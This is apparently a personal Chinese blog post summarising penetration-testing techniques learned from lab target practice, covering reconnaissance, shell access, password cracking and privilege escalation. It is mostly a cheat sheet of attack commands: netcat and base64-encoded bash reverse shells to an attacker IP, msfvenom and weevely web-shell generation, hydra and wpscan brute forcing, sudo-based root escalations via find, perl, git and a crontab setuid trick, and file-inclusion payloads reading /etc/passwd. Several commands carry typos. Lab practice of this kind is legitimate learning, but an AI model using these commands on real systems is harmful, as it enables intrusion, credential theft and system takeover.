打靶后个人的一些总结

1. 信息搜集

做渗透测试,首先最基础的也是最重要的是信息搜集,良好的信息情报是成功的第一步

1.1. 端口扫描工具

nmap:

常用扫描类型:Nmap常用命令总结_nmap -ss-CSDN博客

常用的端口:

80,默认访问

21,可能有文件可以通过ftp匿名下载

22,ssh

8080,

注意一些不常见的端口,存在漏洞或泄露信息的可能性较大

1.2. 整站扫描工具

nikto:nikto -h ip

owasp-zap:图形化扫描工具

dirb

gobuster:端口内容扫描工具

gobuster dir -u http://ip:端口 -w /usr/share/wordlists/dirb/bing.txt

#后面的是字典

curl:搜寻网站所支持的内容

whatweb:网站类型扫描工具

1.3. 特殊类型网站扫描工具

wpsacn:扫描wordpress网站

joomscan:扫描joomla网站

2. shell获取

2.1. nc反弹shell

通过将靶机的命令行转发到攻击机以获取权限

靶机:nc [攻击机ip] [端口] -e /bin/bash

攻击机:nc -lvp [端口]

2.2. msf

msfconsle

进入msf操作框架,可实现搜索漏洞并攻击,设置监听等功能

常用监听命令:

use exploit/multi/hander

set payload php/meterpreter/reverse_tcp

set lhost 攻击机ip

set lport 4444

run

搜索漏洞:

search 漏洞名

use 漏洞地址

msfvenom

生成木马工具,搭配使用

msfvenom -p php/meterpreter/reverser_tcp lhost=攻击机ip lport=4444 -f raw > /root/msfshell.php

2.3. weevely

生成、连接木马工具

生成:weevely generate 123456 haha.php

连接:weevely http://木马地址 123456

3. 密码破解

3.1. burp暴力破解

没什么好说的,准备好充足的字典即可

3.2. cewl

搜集可能存在的密码

cewl 域名 -w passwd.txt

3.3. wpscan

破解wordpress站的密码

wpscan –url 域名 -U username.txt -P passwd.txt

3.4. hydra

破解ssh密码

hydra -L username.txt -P passwd.txt [ip地址] ssh -s 7744

3.5. john

john mima.txt

4. 权限提升

4.1. 搜索漏洞提权

sudo -l

find / -perm -u=s -type f 2>/dev/null

查看有什么能以root权限执行

或者查看系统名及版本

uname -a

接着

searchsploit 名称

搜索相关漏洞

4.1.1. 常见漏洞

find

创建一个名为hah的文件

touch hah

查找并执行命令

*find / -name hah -exec “/bin/sh” *

perl

sudo perl -e “exec’bin/sh’”

teehee(ssh)

sudo teehee /etc/crontab #teehee是一个可以写文件的东西

* * * * * root chmod 4777 /bin/sh #每分钟执行一次,定时提权

4.2. 命令行提权

echo $PATH #查看当前的命令行

BASH_CMDS[a]=/bin/sh #按下键盘a就可以调用/bin/sh命令行

/bin/bash(kali中常用的命令行)

export PATH=PATH:/bin

export PATH=PATH:/sbin:/bin

#把高级权限的命令行也加到自己的path(环境变量)里

4.3. git提权

git提权,下面两条都可以用

sudo git -p –help

sudo git help config #任选一条

git命令在查看帮助文档的时候可以敲命令,命令格式为[!+命令]

每一次输命令都要!+命令,就是借用git的root权限执行命令

5. 其他

5.1. ssh漏洞

免登录执行

ssh 用户名@localhost 命令

ssh ‘‘@xxx.xxx.xxx.xxx

5.2. 修改drupal管理员密码

drush user-password admin –password=”123456”

5.3. 下载命令

wget

5.4. nc被屏蔽掉的情况

执行如下命令后会出现一串编码

echo ‘bash -i >& /dev/tcp/攻击机ip/1234 0>&1’ | base64

在漏洞处

echo 编码 | base64 -d|bash

5.5. 域名屏蔽

有的网站无法通过ip地址直接访问

在/root/hosts中添加

ip地址 域名

5.6. 文件包含漏洞利用

查看密码

file=../../../../../../etc/passwd

查看源码

file=php://filter/convert.base64-encode/resource=index.php

ssh登录日志

file=/var/log/auth.log


打靶后个人的一些总结
http://example.com/2024/03/21/打靶后个人的一些总结/
Author
w1t2f3
Posted on
March 21, 2024
Licensed under